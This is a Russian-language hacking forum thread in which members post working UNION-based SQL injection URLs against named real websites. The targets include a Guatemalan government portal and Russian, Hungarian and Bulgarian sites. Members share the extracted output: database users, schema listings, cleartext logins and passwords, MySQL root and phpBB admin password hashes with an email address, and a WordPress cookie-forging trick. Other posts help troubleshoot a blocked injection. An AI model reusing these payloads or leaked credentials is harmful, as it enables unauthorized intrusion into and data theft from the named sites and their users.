SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    Tyc00n, руки все равно будут всегда лучше и надежнее :) Словари обнови, добавь стандартные таблицы и поля двигов распостраненных, сам допиши, посмотри по форуму и не будет пропускать)
     
  2. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,170
    Likes Received:
    1,155
    Reputations:
    202
    sql inj
    php inc
     
    1 person likes this.
  3. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    b3, что-то мне подсказывает, что для пхп-инжей тут есть отдельная тема)
     
  4. bobob

    bobob Member

    Joined:
    2 Jun 2006
    Messages:
    111
    Likes Received:
    69
    Reputations:
    -15
    4.1.20:vxweb@jazzy:allaboutjazz

    :mad: а таблички не подобрал, есть мемберка

    порыскайте кому не лень
     
  5. bobob

    bobob Member

    Joined:
    2 Jun 2006
    Messages:
    111
    Likes Received:
    69
    Reputations:
    -15
    :) саксесс

    http://e*s*h*o*p.w*h*t*t.org/order.php

    :cool:
    пхпмайадмин имеет стандартный урл, но пас и логин я не нашел ((( и админку не нашел, если кто узнает скрипт - ставьте на локалку, там и таблички с колонками найдете и пути, и всё ваше будет. Так как я таблички и колонки на угад писал :eek:

    уберите звёздочки и не цитируйте плз урл, так как потом удалю может
     
    #4625 bobob, 30 Jan 2008
    Last edited: 30 Jan 2008
    1 person likes this.
  6. 159932

    159932 Elder - Старейшина

    Joined:
    28 Sep 2007
    Messages:
    587
    Likes Received:
    462
    Reputations:
    5
    звиняйте за оффтоп - bobob зачем звёзды в урле ?
     
  7. bobob

    bobob Member

    Joined:
    2 Jun 2006
    Messages:
    111
    Likes Received:
    69
    Reputations:
    -15
    ну шоп, чтоб потом сюда не пришли по гуглу
     
  8. .Begemot.

    .Begemot. Elder - Старейшина

    Joined:
    27 Mar 2007
    Messages:
    148
    Likes Received:
    233
    Reputations:
    0
    oferta9.ro
    HTML:
    http://www.oferta9.ro/magazin.php?m=-661+union+select+0,1,2,3,4,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),6,7,8,9/*
    USER:mn76_iuser@localhost
    VERSION:4.1.22-standard
    DATABASE:mn76_piata9
    disenoemergente.cl
    HTML:
    http://www.disenoemergente.cl/index_noticia.php?noticia=-177+union+select+0,1,2,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),4,5,6,7,8,9,10/*
    USER:diseno@localhost
    VERSION:5.0.32-Debian_7etch4-log
    DATABaSE:diseno
    guatemala.gob.gt
    HTML:
    http://www.guatemala.gob.gt/noticias.php?mes=1&anyo=2006&dia=14&tipo=1+union+select+0,1,convert(concat(USER(),0x3a,VERSION(),0x3a,DATABASE())+using+latin1),3,4,5,6,7,8,9,10,11,12/*
    USER:root@localhost
    VERSION:4.1.7
    DATABASE:presidencia
     
  9. ~EviL~

    ~EviL~ Elder - Старейшина

    Joined:
    14 Aug 2007
    Messages:
    169
    Likes Received:
    77
    Reputations:
    4
    http://rs.karacitours-bg.info/

    HTML:
    http://rs.karacitours-bg.info/cms_show_hotel.php?id=4274+UNION+SELECT+1,2,3,4,5,6,7,concat_ws(0x3a,version(),user(),database())/*
    5.0.32-Debian_7etch1-log:root@localhost:cs

    HTML:
    http://rs.karacitours-bg.info/cms_show_hotel.php?id=4274+UNION+SELECT+1,2,3,4,5,6,7,concat_ws(0x3a,id,username,pwd)+FROM+alfauser+LIMIT+1,1/*
    1:karaci:karaci123
    2:rual:rual123
    3:desi_karaci:desi001

    ...

    HTML:
    http://rs.karacitours-bg.info/cms_show_hotel.php?id=4274+UNION+SELECT+1,2,3,4,5,6,7,concat_ws(0x3a,user,password)+FROM+mysql.user/*
    debian-sys-maint:*D9B5ECA68500BC0D046CB07B2CC6F224E4470FE3
     
    2 people like this.
  10. Sharingan

    Sharingan Elder - Старейшина

    Joined:
    5 May 2007
    Messages:
    143
    Likes Received:
    147
    Reputations:
    16
    Австралийский сайтец
    Code:
    http://www.mgnsw.org.au/museums_and_galleries.php?id=-1+union+select+1,concat(version(),0x3a,user(),0x3a,database()),3,4,5,6/*
    4.1.20:mgnsw@localhost:mgnsw
     
    2 people like this.
  11. MaSter GeN

    MaSter GeN Elder - Старейшина

    Joined:
    26 Jan 2008
    Messages:
    52
    Likes Received:
    31
    Reputations:
    0
    Вот такой интересный скуль

    Code:
    http://www.ipecac.com/bio.php?id=44'
    подобрал количество столбцов через order by т.е
    вот такой код вызывает ошибку

    Code:
    http://www.ipecac.com/bio.php?id=44+order+by+5/*
    вот такой нет

    Code:
    http://www.ipecac.com/bio.php?id=44+order+by+4*
    следовательно должно рабоать
    Code:
    http://http://www.ipecac.com/bio.php?id=44/**/union/**/select/**/1,2,3,4/*
    но почему то кричит:You don't have permission to access /bio.php on this server.
    в чем проблема ? :)
     
    1 person likes this.
  12. bobob

    bobob Member

    Joined:
    2 Jun 2006
    Messages:
    111
    Likes Received:
    69
    Reputations:
    -15
    4 штуки, но не пускает действительно, шяс еще порыскаю
    может у них там просто траблы с самим скриптом и мы не виноваты

    апд - не асили, а шоп у них всёравно на другом домене под aspx :mad:
     
    #4632 bobob, 31 Jan 2008
    Last edited: 31 Jan 2008
  13. MaSter GeN

    MaSter GeN Elder - Старейшина

    Joined:
    26 Jan 2008
    Messages:
    52
    Likes Received:
    31
    Reputations:
    0
    что за нах там ещё xss пассив есть news_search.php
    так с ней та же самая прабла орет :
    You don't have permission to access /news_search.php on this server.
    что за зашита такая o_O подскажите !
     
  14. vp$

    vp$ Elder - Старейшина

    Joined:
    22 Oct 2007
    Messages:
    65
    Likes Received:
    68
    Reputations:
    19
    dealer:051db1672e6974a5
    Code:
    17:cb_brends
    17:--1:mid
    17:--2:title
    17:--3:logo
    17:--4:descr
    18:cb_catalog
    18:--1:mid
    18:--2:title
    18:--3:articul
    18:--4:color
    18:--5:sizes
    18:--6:contain
    18:--7:package
    18:--8:description
    18:--9:foto_small
    18:--10:foto_big
    18:--11:brend
    18:--12:newprod
    19:cb_config
    19:--1:email
    19:--2:phone
    19:--3:news_on_main
    20:cb_gallery_albums
    20:--1:parent
    20:--2:name
    20:--3:description
    21:cb_gallery_images
    21:--1:aid
    21:--2:file
    21:--3:name
    21:--4:description
    21:--5:alt
    21:--6:sort
    21:--7:cover
    22:cb_menu
    22:--1:pid
    22:--2:title
    22:--3:body
    22:--4:modul
    22:--5:ord
    22:--6:_left
    22:--7:_right
    22:--8:_level
    22:--9:protect
    23:cb_menu_seq
    24:cb_news
    24:--1:mid
    24:--2:title
    24:--3:anons
    24:--4:body
    24:--5:date
    25:about
    25:--1:img1
    25:--2:img2
    25:--3:img3
    25:--4:img4
    25:--5:img5
    25:--6:text
    26:about_main
    26:--1:img1
    26:--2:img2
    26:--3:img3
    26:--4:img4
    26:--5:img5
    27:adv
    27:--1:razdel_num
    27:--2:head
    27:--3:link_excel
    27:--4:excel
    27:--5:link_html
    27:--6:html
    27:--7:text
    28:anons
    28:--1:head
    28:--2:img
    28:--3:type
    28:--4:text
    28:--5:when
    28:--6:visibility
    29:asociate
    29:--1:asociate_teacher
    29:--2:asociate_to
    29:--3:asociate_type
    30:auth
    30:--1:password
    31:cons
    31:--1:name
    31:--2:email
    31:--3:city
    31:--4:message
    31:--5:answer
    31:--6:time
    32:dealers
    32:--1:login
    32:--2:password
    33:dealers_files
    33:--1:name
    33:--2:file
    33:--3:text
    34:fakultet
    34:--1:fakultet_name
    34:--2:fakultet_type
    35:groupe
    35:--1:groupe_name
    35:--2:groupe_id_kaf
    
     
    2 people like this.
  15. gibson

    gibson Elder - Старейшина

    Joined:
    24 Feb 2006
    Messages:
    391
    Likes Received:
    247
    Reputations:
    88
    свежая уязвимость и ...
    admin|91b41df29d41d9222c99702c718c27c1

    admin|5cf5e1e79cc08b7b27e2dfeb6ee136a7

    djsonic|85493514b935d53994045bdb044a4ab5

    двойной md5 хэш пароль
    wordpressuser_xxx=логин;wordpresspass_xxx=двойной_md5_хэш_пароля
    где xxx - md5 хэш урла блога без обратного слэша, например: md5("xttp//site.com/wordpress")
     
    3 people like this.
  16. .Begemot.

    .Begemot. Elder - Старейшина

    Joined:
    27 Mar 2007
    Messages:
    148
    Likes Received:
    233
    Reputations:
    0
    Нужно чтобы -17' - было существующий значение. 17+order+by+1/*
    Подробнее https://forum.antichat.ru/showpost.php?p=373193&postcount=17
    Вообщето есть специальная тема для таких вопросов - http://forum.antichat.ru/threadedpost579824.html#post579824
     
    #4636 .Begemot., 31 Jan 2008
    Last edited: 31 Jan 2008
    2 people like this.
  17. 159932

    159932 Elder - Старейшина

    Joined:
    28 Sep 2007
    Messages:
    587
    Likes Received:
    462
    Reputations:
    5
    для bobob
    возми для примера -
    http://www.roskrup.ru/grain.html?goods=35'+order+by+1/*
    http://www.roskrup.ru/grain.html?goods=35'+order+by+50/*
     
    1 person likes this.
  18. bobob

    bobob Member

    Joined:
    2 Jun 2006
    Messages:
    111
    Likes Received:
    69
    Reputations:
    -15
    .Begemot., 159932, терь понял, сравнивать надо было существующие, меня глючит иногда! СПАСИБО!!!
     
  19. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    http://www.mediakuzbass.ru/news/index.php?id=-1+union+select+1,2,concat_ws(0x2F,version(),database(),user()),4,5,6/*

    4.1.22/media/trakt@localhost
    -----------------------------------------------------------------------------

    http://www.mobd.ru/index.php?id=-1+union+select+1,concat_ws(0x2F,version(),database(),user()),3,4/*

    4.0.25-log/wwwmobdru_mobdru_osc1/[email protected]
    -----------------------------------------------------------------------------
    fisinter.ru

    http://fisinter.ru/nametip20060207/nametip.htm?lang=de&name=335&tip=-1)+union+select+1,concat_ws(0x2F,version(),database(),user()),3/*

    5.0.15-standard-log/KmUtfDe/db@localhost


    http://fisinter.ru/nametip20060207/nametip.htm?lang=de&name=335&tip=-1)+union+select+1,concat_ws(0x2F,user,Password),3+from+mysql.user/*

    юзер/хеш
    root/39d3d1360b2b23b0
    --------------------------------------------------------------------------
    novoport.ru


    http://www.novoport.ru/news.php?id=-1+union+select+1,2,concat_ws(0x2F,version(),database(),user()),4,5,6/*

    4.0.24_Debian-10sarge2/nvp/root@localhost


    http://www.novoport.ru/news.php?id=-1+union+select+1,2,concat_ws(0x2F,username,user_password,user_email),4,5,6+from+phpbb_users/*

    логин/хеш/мейл
    Admin/d4825e84f0ce065b97c2c0772f769f1a/[email protected]
     
    2 people like this.
  20. .Begemot.

    .Begemot. Elder - Старейшина

    Joined:
    27 Mar 2007
    Messages:
    148
    Likes Received:
    233
    Reputations:
    0
    rentacarmm.com
    HTML:
    http://www.rentacarmm.com/?op=page&lan=BG+union+select+0,concat(user(),0x3a,version(),0x3a,database()),2/*&id=65
    USER:car@localhost
    VERSION:5.0.45-Debian_1-log
    DATABASE:car
    HTML:
    http://www.rentacarmm.com/?op=page&lan=BG+union+select+0,table_name,2+from+information_schema.tables/*&id=65
    HTML:
    http://www.rentacarmm.com/?op=page&lan=BG+union+select+0,column_name,2+from+information_schema.columns/*&id=65
    -----------------------------------------------
    tercersector.net
    HTML:
    http://www.tercersector.net/php/general.php?seccio=sc_pubs&tipus=1+union+select+concat(USER(),0x3a,VERSION(),0x3a,DATABASE())/*&idioma=Cs
    USER:[email protected]
    VERSION:4.0.24_Debian-10sarge3-log
    DATABASE:eek:tsweb
    -----------------------------------------------
    tecnocasa.hu
    HTML:
    http://www.tecnocasa.hu/cgi-bin/uj/fo.php?t=iroda&ID=-1+union+select+0,1,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*&PHPSESSID=29b0ba2892876c303128bb0626336391
    USER:rkcsaGfm7@hm0
    VERSION:5.0.32-Debian_7etch4-log
    DATABASE:tecnocasa_hu
    HTML:
    http://www.tecnocasa.hu/cgi-bin/uj/fo.php?t=iroda&ID=-1+union+select+0,1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+information_schema.tables/*&PHPSESSID=29b0ba2892876c303128bb0626336391
    HTML:
    http://www.tecnocasa.hu/cgi-bin/uj/fo.php?t=iroda&ID=-1+union+select+0,1,column_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+information_schema.columns/*&PHPSESSID=29b0ba2892876c303128bb0626336391
    HTML:
    http://www.tecnocasa.hu/cgi-bin/uj/fo.php?t=iroda&ID=-1+union+select+0,1,column_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+information_schema.columns+where+table_name='district'+limit+1,10/*&PHPSESSID=29b0ba2892876c303128bb0626336391
    - вывод всех названий колонок таблици district
     
    1 person likes this.
Thread Status:
Not open for further replies.